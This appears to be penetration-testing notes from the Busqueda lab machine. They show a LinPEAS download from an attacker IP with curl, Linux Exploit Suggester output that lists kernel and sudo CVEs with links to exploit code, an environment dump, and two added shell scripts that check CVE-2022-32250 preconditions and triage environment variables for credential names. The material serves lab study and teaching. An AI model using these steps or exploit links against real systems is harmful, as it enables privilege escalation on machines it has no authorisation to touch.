PEAS


svc@busqueda:/dev/shm$ mount | grep -i tmpfs
udev on /dev type devtmpfs (rw,nosuid,relatime,size=935772k,nr_inodes=233943,mode=755,inode64)
tmpfs on /run type tmpfs (rw,nosuid,nodev,noexec,relatime,size=198824k,mode=755,inode64)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,inode64)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k,inode64)
tmpfs on /run/snapd/ns type tmpfs (rw,nosuid,nodev,noexec,relatime,size=198824k,mode=755,inode64)

/dev/shm

svc@busqueda:/dev/shm$ curl -s http://10.10.16.8/linpeas_CVE_check.sh -o ./linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete

svc@busqueda:/dev/shm$ ll
total 0
0 drwxrwxrwt  2 root root   40 nov 27 17:57 .
0 drwxr-xr-x 20 root root 4.0k nov 27 15:51 ..

A moment later, the content of the directory is WIPED OUT. This surely indicates that there is a running cronjob.

I will try out the /var/tmp directory instead.

svc@busqueda:/var/tmp$ curl -s http://10.10.16.8/linpeas_CVE_check.sh -o ./linpeas.sh ; chmod 755 ./linpeas.sh

Executing PEAS

CVEs


╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: probable
   Tags: [ ubuntu=(22.04) ]{kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
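Linux Exploit Suggester rates exposure from the distro name and the kernel version string alone, and Ubuntu backports fixes without bumping the upstream version, so "probable" for CVE-2022-32250 on 5.15.0-27-generic needs to be verified on the host before spending time on a kernel exploit. The script below is an added example of that verification (my own, not part of LES, LinPEAS or the original notes). It tests the three preconditions LES names for the nf_tables UAFs: a kernel ABI older than the patched one, unprivileged user namespaces (Ubuntu's kernel.unprivileged_userns_clone knob, with a live unshare as fallback on kernels that lack it), and nf_tables being loaded or built in. The FIXED_ABI argument is an assumption supplied by the caller; look the real value up in the matching Ubuntu USN rather than trusting any number typed here.

```shell
#!/bin/sh
# Added check for the LES findings above (my own script, not part of LES or the
# original writeup). FIXED_ABI is an assumption passed in by the caller, not a
# claim about which Ubuntu 5.15 release actually closed CVE-2022-32250.
# usage (on the target):  . ./les_check.sh; les_check "$(uname -r)" 5.15.0-NN

# ver_cmp A B: print lt, eq or gt; version sort understands "5.15.0-27-generic".
ver_cmp() {
    if [ "$1" = "$2" ]; then echo eq; return 0; fi
    if [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]; then
        echo lt
    else
        echo gt
    fi
}

# kernel_below RUNNING FIXED_ABI: true when the running ABI predates the fix.
kernel_below() {
    [ "$(ver_cmp "$1" "$2")" = lt ]
}

# userns_allowed [FILE]: read Ubuntu's kernel.unprivileged_userns_clone knob
# (1 = allowed). When the knob is absent (mainline kernels), try to create a
# user namespace for real instead of guessing.
userns_allowed() {
    f=${1:-/proc/sys/kernel/unprivileged_userns_clone}
    if [ -r "$f" ]; then
        [ "$(tr -d '[:space:]' < "$f")" = 1 ]
    else
        unshare -Ur true 2>/dev/null
    fi
}

# module_present NAME [MODULES_FILE]: loaded as a module (/proc/modules) or
# built into the kernel (/sys/module/NAME exists either way).
module_present() {
    grep -q "^$1 " "${2:-/proc/modules}" 2>/dev/null || [ -d "/sys/module/$1" ]
}

# les_check RUNNING FIXED_ABI: one verdict line per precondition; exit 0 only
# when all three hold on the live host.
les_check() {
    running=${1:-$(uname -r)}
    fixed=$2
    rc=0
    if kernel_below "$running" "$fixed"; then
        echo "[+] kernel $running predates $fixed"
    else
        echo "[-] kernel $running is not older than $fixed"; rc=1
    fi
    if userns_allowed; then
        echo "[+] unprivileged user namespaces allowed"
    else
        echo "[-] unprivileged user namespaces blocked"; rc=1
    fi
    if module_present nf_tables; then
        echo "[+] nf_tables available"
    else
        echo "[-] nf_tables not loaded"; rc=1
    fi
    return $rc
}
```

A "[-]" on any line means the LES entry is noise for this host; the same three checks apply to CVE-2022-2586, which LES lists with the same userns comment.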

ENV VARs


╔══════════╣ Environment
 Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
pm_out_log_path=/root/.pm2/logs/app-out.log
HISTFILESIZE=0
app={}
USER=svc
restart_time=0
PM2_USAGE=CLI
SHLVL=3
gid=1000
HOME=/home/svc
username=root
OLDPWD=/var/www/app
PM2_HOME=/root/.pm2
PM2_INTERACTOR_PROCESSING=true
created_at=1701100278221
PYTHONUNBUFFERED=1
pm_cwd=/var/www/app
namespace=default
uid=1000
SYSTEMD_EXEC_PID=1276
WERKZEUG_SERVER_FD=4
pm_exec_path=/var/www/app/app.py
unstable_restarts=0
pm_id=0
kill_retry_time=100
LOGNAME=root
node_args=
journal_stream=8:36022
_=./linpeas.sh
TERM=xterm-256color
exec_mode=fork_mode
NODE_APP_INSTANCE=0
axm_monitor=[object Object]
windowsHide=true
status=launching
path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
exec_interpreter=python3
INVOCATION_ID=21d1137ec0c8492e8e522b7b7a806a51
axm_options=[object Object]
axm_dynamic=[object Object]
LANG=en_US.UTF-8
vizion=true
pm_pid_path=/root/.pm2/pids/app-0.pid
pm_err_log_path=/root/.pm2/logs/app-error.log
HISTSIZE=0
treekill=true
LS_COLORS=
PM2_JSON_PROCESSING=true
SHELL=/bin/sh
pmx=true
unique_id=43136e0a-3f8b-4cc7-a840-b448432d1915
NODE_CHANNEL_SERIALIZATION_MODE=json
automation=true
LESSCLOSE=/usr/bin/lesspipe %s %s
vizion_running=false
cwd=/var/www/app
instance_var=NODE_APP_INSTANCE
name=app
PWD=/var/tmp
env=[object Object]
PIDFILE=/root/.pm2/pm2.pid
km_link=false
instances=1
axm_actions=
merge_logs=true
NODE_CHANNEL_FD=3
autorestart=true
HISTFILE=/dev/null
pm_uptime=1701100278221
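The answer to LinPEAS's question is in the dump itself: USER=svc and HOME=/home/svc, but LOGNAME=root, username=root, PM2_HOME=/root/.pm2 and pm_exec_path=/var/www/app/app.py, so this shell inherited the environment of a pm2-managed process whose home is /root/.pm2, and HISTFILE=/dev/null with HISTSIZE=0 shows shell history has been switched off. The script below is an added example of triaging such a dump automatically (my own, not LinPEAS code). The sample lines are taken from the dump above except for one constructed APP_SECRET line, added so the credential-name rule has something to match.

```shell
#!/bin/sh
# Added triage for an `env`-style dump (my own script, not LinPEAS output).
# usage:  env > /tmp/e; env_triage /tmp/e      or     sample_env > /tmp/e

# sample_env: lines from the dump above plus one CONSTRUCTED line
# (APP_SECRET, not in the original) for the secret-name rule.
sample_env() {
    cat <<'EOF'
USER=svc
LOGNAME=root
HOME=/home/svc
PM2_HOME=/root/.pm2
PIDFILE=/root/.pm2/pm2.pid
pm_out_log_path=/root/.pm2/logs/app-out.log
pm_exec_path=/var/www/app/app.py
username=root
HISTFILE=/dev/null
HISTSIZE=0
PWD=/var/tmp
APP_SECRET=changeme
EOF
}

# env_triage FILE: print one "category: detail" line per finding.
env_triage() {
    f=$1
    me=$(sed -n 's/^USER=//p' "$f" | head -n 1)
    login=$(sed -n 's/^LOGNAME=//p' "$f" | head -n 1)

    # 1. identity mismatch: the shell is one user, the inherited env names another
    if [ -n "$me" ] && [ -n "$login" ] && [ "$me" != "$login" ]; then
        echo "identity: USER=$me but LOGNAME=$login"
    fi

    # 2. values pointing into a home directory that is not ours
    #    (paths under /root or /home/<someone else>)
    grep -E '=.*(/root(/|$)|/home/[^/]+(/|$))' "$f" \
        | grep -vE "=.*/home/$me(/|$)" \
        | sed 's/^/foreign-home: /'

    # 3. variable names that usually carry credentials
    grep -iE '^[^=]*(pass|secret|token|cred|api_?key|private)[^=]*=' "$f" \
        | sed 's/^/secret-name: /'

    # 4. shell history deliberately disabled
    grep -E '^(HISTFILE=/dev/null|HISTSIZE=0|HISTFILESIZE=0)$' "$f" \
        | sed 's/^/no-history: /'
}
```

On the sample the foreign-home rule returns the three /root/.pm2 paths and skips HOME=/home/svc; every such path is a file root-owned software expects to read or write, which is worth checking for permissions next.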

Containers


System Timer Services


╔══════════╣ System timers
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT                        LEFT          LAST                        PASSED                UNIT                           ACTIVATES
mon 2023-11-27 18:19:41 UTC 14min left    Tue 2023-04-04 16:06:52 UTC 7 months 24 days ago  motd-news.timer                motd-news.service
mon 2023-11-27 20:08:39 UTC 2h 3min left  Tue 2023-02-28 11:52:21 UTC 8 months 28 days ago  apt-daily.timer                apt-daily.service
mon 2023-11-27 23:29:51 UTC 5h 25min left Mon 2023-11-27 16:48:44 UTC 1h 16min ago          ua-timer.timer                 ua-timer.service
tue 2023-11-28 00:00:00 UTC 5h 55min left n/a                         n/a                   dpkg-db-backup.timer           dpkg-db-backup.service
tue 2023-11-28 00:00:00 UTC 5h 55min left Mon 2023-11-27 15:51:06 UTC 2h 13min ago          logrotate.timer                logrotate.service
tue 2023-11-28 02:48:37 UTC 8h left       Fri 2023-01-06 15:07:14 UTC 10 months 20 days ago fwupd-refresh.timer            fwupd-refresh.service
tue 2023-11-28 06:45:46 UTC 12h left      Mon 2023-11-27 16:34:03 UTC 1h 30min ago          apt-daily-upgrade.timer        apt-daily-upgrade.service
tue 2023-11-28 10:01:27 UTC 15h left      Mon 2023-11-27 16:58:25 UTC 1h 6min ago           man-db.timer                   man-db.service
tue 2023-11-28 15:56:01 UTC 21h left      Mon 2023-11-27 15:56:01 UTC 2h 8min ago           update-notifier-download.timer update-notifier-download.service
tue 2023-11-28 16:05:59 UTC 22h left      Mon 2023-11-27 16:05:59 UTC 1h 58min ago          systemd-tmpfiles-clean.timer   systemd-tmpfiles-clean.service
tue 2023-11-28 23:55:08 UTC 1 day 5h left Wed 2022-06-15 15:13:23 UTC 1 year 5 months ago   update-notifier-motd.timer     update-notifier-motd.service
sun 2023-12-03 03:10:04 UTC 5 days left   Mon 2023-11-27 15:51:54 UTC 2h 12min ago          e2scrub_all.timer              e2scrub_all.service
mon 2023-12-04 00:22:58 UTC 6 days left   Mon 2023-11-27 16:30:00 UTC 1h 34min ago          fstrim.timer                   fstrim.service
n/a                         n/a           n/a                         n/a                   apport-autoreport.timer        apport-autoreport.service
n/a                         n/a           n/a                         n/a                   snapd.snap-repair.timer        snapd.snap-repair.service

Hosts


gitea.searcher.htb

Busqueda


Installed Programs


Compilers


MySQL


Web


This explains the Busqueda

SSH


tmux


/opt